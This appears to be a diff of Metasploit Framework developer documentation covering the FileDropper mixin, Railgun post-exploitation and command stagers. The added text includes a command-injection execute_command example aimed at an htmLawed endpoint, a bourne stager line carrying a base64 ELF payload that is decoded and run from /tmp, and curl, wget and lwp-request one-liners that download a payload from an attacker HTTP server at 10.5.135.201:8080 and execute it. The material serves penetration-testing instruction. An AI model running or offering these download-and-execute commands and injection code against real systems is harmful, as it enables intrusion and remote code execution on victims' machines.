+The [FileDropper mixin](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/file_dropper.rb) is a file manager that allows you to keep track of files, and then delete them when a session is created. To use it, first include the mixin:
+
+```ruby
+include Msf::Exploit::FileDropper
+```
+
+Next, tell the FileDropper mixin where the file is going to be after a session is created by using the `register_file_for_cleanup` method. Each file name should either be a full path or relative to the current working directory of the session. For example, if I want to upload a payload to the target machine's remote path: `C:\Windows\System32\payload.exe`, then my statement can be:
+
+```ruby
+register_file_for_cleanup("C:\\Windows\\System32\\payload.exe")
+```
+
+If my session's current directory is already in `C:\Windows\System32\`, then you can:
+
+```ruby
+register_file_for_cleanup("payload.exe")
+```
+
+If you wish to register multiple files, you can also provide the file names as arguments:
+
+```ruby
+register_file_for_cleanup("file_1.vbs", "file_2.exe", "file_1.conf")
+```
+
+Note that if your exploit module uses `on_new_session`, you are actually overriding FileDropper's `on_new_session`.
+
@@ -62,6 +62,14 @@ The other one is ```inspect```, which returns a string of a human-readable repre
 session.inspect
 ```

+One commonly used method of the session object is the `platform` method. For example, if you're writing a post module for a windows exploit, in the check method you'll likely want to use `session.platform` to ensure the target session is affected:
+```ruby
+    unless session.platform == 'windows'
+      # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+```
+
 You can also look at [other current post modules](https://github.com/rapid7/metasploit-framework/tree/master/modules/post) and see how they use their session object.

 ### The Msf::Post Mixin
@@ -1,8 +1,8 @@
-Railgun is a very powerful post exploitation feature exclusive to Windows Meterpreter. It allows you to have complete control of your target machine's Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user's password, but it is encrypted and there are no tools out there for decryption. With Railgun, what you can do is you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program's DLL that's responsible for the decryption, call it, and let it decrypt it for you. If you're a penetration tester, obviously post exploitation is an important skill to have, but if you don't know Railgun, you are missing out a lot.
+Railgun is a very powerful post exploitation feature exclusive to the Windows and Python Meterpreters. It allows you to have complete control of your target machine's Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a Meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user's password, but it is encrypted and there are no tools out there for decryption. With Railgun, you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program's DLL that's responsible for the decryption, call it, and let it decrypt it for you. If you're a penetration tester, obviously post exploitation is an important skill to have, but if you don't know Railgun, you are missing out a lot.

-### Defining a DLL and its functions
+## Defining a DLL and its functions

-The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: kernel32, ntdll, user32, ws2_32, iphlpapi, advapi32, shell32, netapi32, crypt32, wlanapi, wldap32, version. The same list of built-in DLLs can also be retrieved by using the ```known_dll_names``` method.
+The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: advapi32, crypt32, dbghelp, iphlpapi, kernel32, netapi32, ntdll, psapi, shell32, spoolss, user32, version, winspool, wlanapi, wldap32, and ws2_32. The same list of built-in DLLs can also be retrieved by using the `known_library_names` method.

 All DLL definitions are found in the "[def](https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi/railgun/def)" directory, where they are defined as classes. The following template should demonstrate how a DLL is actually defined:

@@ -16,16 +16,16 @@ module Stdapi
 module Railgun
 module Def

-class Def_somedll
+class Def_windows_somedll

-  def self.create_dll(dll_path = 'somedll')
-    dll = DLL.new(dll_path, ApiConstants.manager)
+  def self.create_library(constant_manager, dll_path = 'somedll')
+    dll = Library.new(library_path, constant_manager)

    # 1st argument = Name of the function
    # 2nd argument = Return value's data type
    # 3rd argument = An array of parameters
    dll.add_function('SomeFunction', 'DWORD',[
-      ["DWORD","hwnd","in"]
+      ['DWORD','hwnd','in']
    ])

    return dll
@@ -36,32 +36,34 @@ end
 end; end; end; end; end; end; end
 ```

-In function definitions, Railgun supports these datatypes: VOID, BOOL, DWORD, WORD, BYTE, LPVOID, HANDLE, PDWORD, PWCHAR, PCHAR, PBLOB.
+In function definitions, Railgun supports these data types: BOOL, BYTE, DWORD, LPVOID, PBLOB, PCHAR, PDWORD, PULONG_PTR, PWCHAR, ULONG_PTR, VOID, WORD.

-There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an "in" parameter, Railgun handles the memory management. For example, ```MessageBoxA``` has a "in" parameter named ```lpText```, and is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest, it's all pretty straight forward.
+There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an "in" parameter, Railgun handles the memory management. For example, `MessageBoxA` has an "in" parameter named `lpText`, and is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest, it's all pretty straight forward.

-An "out" parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash.
+An "out" parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash. Some datatypes such as LPVOID and ULONG_PTR have a size that is determined based on the host architecture, e.g. 32-bit versions of Windows use 4-byte/32-bit values. For cross compatibility, the number 4 (for 4-bytes) can be used as the size for these values on both 32-bit and 64-bit systems. The number four comes from the size used for these types in the original 32-bit implementation and was selected to maintain backwards compatibility when 64-bit support was added.

 An "inout" parameter serves as an input to the called function, but can be potentially modified by it. You can inspect the return hash for the modified value like an "out" parameter.

-A quick way to define a new function at runtime can be done like the following example:
+The fourth type, "return" is used as the return data type. It is passed to `#add_function` after the function name argument.
+
+A quick way to define a new function (or redefine an existing function) at runtime can be done like the following example:

 ```ruby
 client.railgun.add_function('user32', 'MessageBoxA', 'DWORD',[
-	["DWORD","hWnd","in"],
-	["PCHAR","lpText","in"],
-	["PCHAR","lpCaption","in"],
-	["DWORD","uType","in"]
+	['DWORD','hWnd','in'],
+	['PCHAR','lpText','in'],
+	['PCHAR','lpCaption','in'],
+	['DWORD','uType','in']
 ])
 ```

-However, if this function will most likely be used more than once, or it's part of the Windows API, then you should put it in the library.
+However, if this function will most likely be used more than once, or it's part of the Windows API, then you should put it in to the library.

-### Usage
+## Usage

 The best way to try Railgun is with irb in a Windows Meterpreter prompt. Here's an example of how to get there:

-```
+```msf
 $ msfconsole -q
 msf > use exploit/multi/handler
 msf exploit(handler) > run
@@ -72,70 +74,81 @@ msf exploit(handler) > run
 [*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.106:55148) at 2014-07-30 19:49:35 -0500

 meterpreter > irb
-[*] Starting IRB shell
-[*] The 'client' variable holds the meterpreter client
+[*] Starting IRB shell...
+[*] You are in the "client" (session) object

 >>
 ```

-Note that when you're running a post module or in irb, you always have a ```client``` or ```session``` object to work with, both point to same thing, which in this case is ```Msf::Sessions::Meterpreter_x86_Win```. This Meterpreter session object gives you API access to the target machine, including the Railgun object ```Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun```. Here's how you simply access it:
+Note that when you're running a post module or in irb, you always have a `client` or `session` object to work with, both point to same thing, which in this case is `Msf::Sessions::Meterpreter_x86_Win`. This Meterpreter session object gives you API access to the target machine, including the Railgun object `Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun`. Here's how you simply access it:

 ```ruby
-session.railgun
+railgun
 ```

-If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it's a little unfriendly to read because there's so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you're not sure what DLLs are loaded, you can call the ```known_dll_names``` method:
+If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it's a little unfriendly to read because there's so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you're not sure what DLLs are loaded, you can call the `known_dll_name` method:

 ```
->> session.railgun.known_dll_names
-=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]
+>> railgun.known_library_names
+=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version", "psapi", "dbghelp", "winspool", "spoolss"]
 ```

 Now, say we're interested in user32 and we want to find all the available functions (as well as return value's data type, parameters), another handy trick is this:

 ```ruby
-session.railgun.user32.functions.each_pair {|n, v| puts "Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}"}
+railgun.user32.functions.each_pair {|n, v| puts "Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}"}
 ```

-Note that if you happen to call an invalid or unsupported Windows function, a ```RuntimeError``` will raise, and the error message also shows a list of available functions.
+Note that if you happen to call an invalid or unsupported Windows function, a `RuntimeError` will raise, and the error message also shows a list of available functions.

-To call a Windows API function, here's how:
+To call a Windows API function, call the Ruby function of the desired name on the corresponding library (DLL) object. For example to call `user32!MessageBoxA`:

 ```
->> session.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
+>> railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
 => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
 ```

-As you can see this API call returns a hash. One habit we have seen is that sometimes people don't like to check ```GetLastError```, ```ErrorMessage```, and/or the ```return``` value, they kind of just assume it works. This is a bad programming habit, and is not recommended. If you always assume something works, and execute the next API call, you risk having unexpected results (worst case scenario: losing the Meterpreter session).
+As you can see, this API call returns a hash. The "return" key is the return value of the function, as defined by its defined datatype. If the return type is a pointer to a known type (a pointer other than LPVOID, such as PCHAR), then the "return" key will be the value of that type and an additional "&return" key will be included. The "&return" key, when present, is the address in memory at which the "return" value is located. This is useful when the caller needs to both access the value but also have the ability to free it at a later time. Note that in these cases, if the pointer is NULL, "return" will always be Ruby's `nil` value and "&return" will be 0.

-### Memory Reading and Writing
+The "GetLastError" key is the threads last-error code, as returned by [kernel32!GetLastError][kernel32!GetLastError]. This value is useful for determining if the function call was successful and not not, why it failed. The "ErrorMessage" key is a string to a human readable name of the corresponding "GetLastError" code. When making a function call through railgun, it s important to inspect the results to determine if it was successful before processing any results. There is no error handling for native API calls, so simple mistakes like accessing invalid memory locations will cause the session to close as the host process crashes.

-The ```Railgun``` class also has two very useful methods that you will probably use: ```memread``` and ```memwrite```. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We'll demonstrate this with a new block of memory in the payload itself:
+## Memory Reading and Writing
+
+The `Railgun` class also has useful methods that you will probably use: `memread` and `memwrite`. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We'll demonstrate this with a new block of memory in the payload itself:

 ```
->> p = session.sys.process.open(session.sys.process.getpid, PROCESS_ALL_ACCESS)
+>> process = sys.process.open(sys.process.getpid, PROCESS_ALL_ACCESS)
 => #<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 @client=#<Session:meterpreter 192.168.1.106:55151 (192.168.1.106) "WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM">, @handle=448, @channel=nil, @pid=2268, @aliases={"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x007fe2c5a25828 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x007fe2c5a257b0 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x007fe2c5a25738 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x007fe2c5a256c0 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>}>
->> p.memory.allocate(1024)
+>> address = process.memory.allocate(1024)
 => 5898240
 ```

-As you can see, the new allocation is at address 5898240 (or 0x005A0000 in hex). Let's first write four bytes to it:
+As you can see, the new allocation is at the previously allocated address. Let's first write some data to it:

 ```
->> session.railgun.memwrite(5898240, "AAAA", 4)
+>> railgun.memwrite(address, "AAAA\x00".b)
 => true
 ```

-```memwrite``` returns true, which means successful. Now let's read 4 bytes from 0x005A0000:
+`memwrite` returns true, which means successful. Now let's read 4 bytes from the same address:

 ```
->> session.railgun.memread(5898240, 4)
+>> railgun.memread(address, 4)
 => "AAAA"
 ```

 Be aware that if you supply a bad pointer, you can cause an access violation and crash Meterpreter.

-### References:
+### Reading and Writing Strings
+
+Railgun also has a number of useful utility methods in `railgun.util`. For example, the `#read_string` method can be used to read an ASCII string from memory. A `read_wstring` variant can be used to read UTF-16 strings.
+
+```
+>> railgun.util.read_string(address)
+=> "AAAA"
+```
+
+## References:

 - <https://www.youtube.com/watch?v=AniR-T0AnnI>
 - <https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf>
@@ -144,3 +157,5 @@ Be aware that if you supply a bad pointer, you can cause an access violation and
 - <http://msdn.microsoft.com/en-us/library/aa383749>
 - <http://undocumented.ntinternals.net/>
 - <http://source.winehq.org/WineAPI/>
+
+[kernel32!GetLastError]: https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror
@@ -20,7 +20,7 @@ This may sound surprising, but sometimes we get asked questions that are already

 * **Which ones have been tested**: When a module is developed, usually the exploit isn't tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn't mentioned here, keep in mind there is no guarantee it's going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing.

-* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [check command](How-to-write-a-check-method.md), because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.
+* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [[check command|How-to-write-a-check-method.md]], because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.

 You can use the info command to see the module's description:

@@ -1,6 +1,6 @@
 If you’ve found a way to execute a command on a target, and you’d like the leverage that ability to execute a command into a meterpreter session, command stagers are for you.  Command stagers provide an easy way to write exploits that leverage vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection) and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute.

-The hardest part about command stagers is understanding how much they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.
+The hardest part about command stagers is understanding how much they do and what they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.

 # The Vulnerability Test Case

@@ -70,7 +70,7 @@ include Msf::Exploit::CmdStager

 **2. Declare your flavors**

-To tell `Msf::Exploit::CmdStager` what flavors you want, you can add the ```CmdStagerFlavor``` info in the module's metadata. Either from the common level, or the target level. Multiple flavors are allowed.
+To tell `Msf::Exploit::CmdStager` what flavors you want, you can add the ```CmdStagerFlavor``` info in the module's metadata. Either from the common level, or the target level. Multiple flavors are allowed.  Remember that different flavors have different approaches to staging the payload for execution.  Some flavors will break the payload apart and embed the payload data into multiple `echo` or `printf` commands to write it to disk; others like `wget` and `curl` execute a command to retrieve the payload via network connection.  Your chosen flavor will be determined by the availability of a given command on the target system, the size of the command, the size of the payload, the ability to call out on the network, and the security posture of the target.

 An example of setting flavors for a specific target:

@@ -98,11 +98,32 @@ However, it is best to set the compatible list of flavors in `CmdStagerFlavor`,

 **3. Create the execute_command method**

-You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that
+You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that a great deal of work might already be done for you.  Here is an example of a web host that executes a command as part of a request:
+```ruby
+  def execute_command(cmd, _opts = {})
+    populate_values if @sid.nil? || @token.nil?
+    uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'cookie' => 'sid=' + @sid,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'encode_params' => true,
+      'vars_post' => {
+        'token' => @token,
+        'text' => cmd,
+        'hhook' => 'exec',
+        'sid' => @sid
+      }
+    })
+  end
+```
+Since the command is encapsulated within a request, it will be encoded for us.  When building and debugging an execute_command method that uses web requests, remember that `set httptrace true` will automatically display the http traffic as it is sent and received.

 **4. Decide on the supported payloads**

-CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like netcat, bash, python, or ssh.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
+CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like `netcat`, `bash`, `python`, or `ssh`.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
 The best way to let the user decide what kind of payload to use is by defining separate [[targets|Get-Started-Writing-an-Exploit.md]]

 Here is an example targets section from a command injection module:
@@ -133,10 +154,10 @@ Here is an example targets section from a command injection module:

 ```

-The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk and can just be launched at the command line.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64`.  These targets must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.
+The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk because they are "just" a command, rather than an executable file.  As such, they can be contained and launched within a command line string.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64` and includes binary elf payloads.  These payload types must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.  

 **4. Executing a payload**
-As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to upload, save, and execute your payload, then uses the ```execute_command``` method you defined earlier to run them on the target.
+As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to encode, upload, save, decode, and execute your payload, then uses the ```execute_command``` method you defined earlier to run each command on the target.
 Unfortunately, we just mentioned not all payloads need to be saved to disk.  In the case of a payload that does not need to be saved to disk, we only need to call ```execute_command```.
 This problem of payload/method juggling sounds far worse than it is.  Below is a quick example of how simple the ```exploit``` method will become if you have properly defined your targets as discussed in step 3:

@@ -152,8 +173,7 @@ This problem of payload/method juggling sounds far worse than it is.  Below is a
  end
 ```

-That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the _already_ _encoded_ payload.  You don’t need to worry about encoding the payload in your ```execute_command``` method.
-If the user has selected a binary payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out how to save the file to disk and launch it based on the flavor you set earlier.
+That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the payload because as we said earlier, these payloads will execute within a single command.  If the user has selected a ```dropped``` payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out the series of commands necessary to save the file to disk and launch it based on the flavor and max size you set earlier.

 Over the years, we have also learned that these options are quite handy when calling
 `execute_cmdstager`:
@@ -259,23 +279,26 @@ msf exploit(cmdstager_demo) > run
 # Flavors

 Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
-stagers you can use.
+stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.

 Available flavors:

+Flavors requiring the payload to be broken apart and embedded into the commands:
 * [bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb)
+* [certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb)
 * [debug_asm](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/debug_asm.rb)
 * [debug_write](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/debug_write.rb)
 * [echo](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/echo.rb)
 * [printf](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/printf.rb)
 * [vbs](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb)
-* [certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb)
-* [tftp](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/tftp.rb)
-* [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb)
+
+Flavors that rely on using a command to retrieve the payload via network connection
 * [curl](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/curl.rb)
 * [fetch](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/fetch.rb)
 * [lwprequest](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/lwprequest.rb)
 * [psh_invokewebrequest](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb)
+* [tftp](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/tftp.rb)
+* [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb)


 ## VBS Command Stager - Windows Only
@@ -305,9 +328,7 @@ You will also need to make sure the module's supported platforms include windows

 ## Certutil Command Stager - Windows Only

-[Certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb) is a Windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back and restore CA components, etc. It only comes with newer Windows systems starting from Windows 2012, and Windows 8.
-
-One thing certutil can also do for us is decode the Base64 string from a certificate, and save the decoded content to a file. The following demonstrates:
+[Certutil](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/certutil.rb) is a Windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back up and restore CA components, etc. It only comes with newer Windows systems starting from Windows 2012, and Windows 8.  I find the certutil flavor confusing, as certutil can be used to download files just like `wget` and `ftp`, we do not use it that way here; instead we use `echo` to write the file as a base64 encoded certificate, and then we use `certutil` to decode it prior to execution:

 ```bash
 echo -----BEGIN CERTIFICATE----- > encoded.txt
@@ -433,8 +454,17 @@ execute_cmdstager(flavor: :psh_invokewebrequest )

 **Linemax** minimum: 373

-The [Bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb) command stager supports multiple platforms except for Windows (because the use of the which command that Windows does not have). It functions rather similar to the VBS stager, except when it decodes the Base64 payload at runtime, there are multiple commands to choose from: base64, openssl, python, or perl.
-
+The [Bourne](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb) command stager supports multiple platforms except for Windows. Just like many other stagers, it writes a base64 encoded payload to disk, but then it tries to decode it using four different commands: base64, openssl, python, and perl.  This is very useful if the target's OS is unpredictable. You can see the way it attempts to use multiple decoding techniques by setting `verbose` to `true` and launching an exploit that has `bourne` as a supported command stager flavor and selecting it as the flavor:
+```
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAA
+AAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoK
+QVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoFh8lRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+
+Wg8FSIXAeO3/5g==>>'/tmp/XtMnQ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (w
+hich openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; pri
+nt base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)
+')) 2> /dev/null > '/tmp/IPUov' < '/tmp/XtMnQ.b64' ; chmod +x '/tmp/IPUov' ; '/tmp/IPUov' ; rm -f '/tmp/IPUov' ; rm -f '
+/tmp/XtMnQ.b64'"]
+```
 To use the Bourne stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -454,7 +484,7 @@ execute_cmdstager(flavor: :bourne)

 The [echo](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/echo.rb) command stager is suitable for multiple platforms except for Windows. It just [echos](http://manpages.ubuntu.com/manpages/trusty/man1/echo.1fun.html) the payload, chmod and execute it. An example of that looks similar to this:

-```
+```bash
 echo -en \\x41\\x41\\x41\\x41 >> /tmp/payload ; chmod 777 /tmp/payload ; /tmp/payload ; rm -f /tmp/payload
 ```

@@ -495,6 +525,11 @@ execute_cmdstager(flavor: :printf)

 ## cURL Command Stager - Multi Platform

+The [cURL](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/curl.rb) command stager uses the `curl` command on the target host to download the payload file. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+curl -so /tmp/dtNGlaaL http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/dtNGlaaL;/tmp/dtNGlaaL;rm -f /tmp/dtNGlaaL"
+```
 To use the cURL stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -510,6 +545,12 @@ execute_cmdstager(flavor: :curl)

 ## wget Command Stager - Multi Platform

+The [wget](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `wget` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+wget -qO /tmp/MZXxujch http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/MZXxujch;/tmp/MZXxujch;rm -f /tmp/MZXxujch
+```
+
 To use the wget stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -525,6 +566,13 @@ execute_cmdstager(flavor: :wget)

 ## LWP Request Command Stager - Multi Platform

+The [lwp-request](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/lwprequest.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `lwp-request` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
+lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU > /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn
+
+```
+
 To use the lwprequest stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -540,6 +588,11 @@ execute_cmdstager(flavor: :lwprequest)

 ## Fetch Command Stager - BSD Only

+The [fetch](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/fetch.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `fetch` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bash
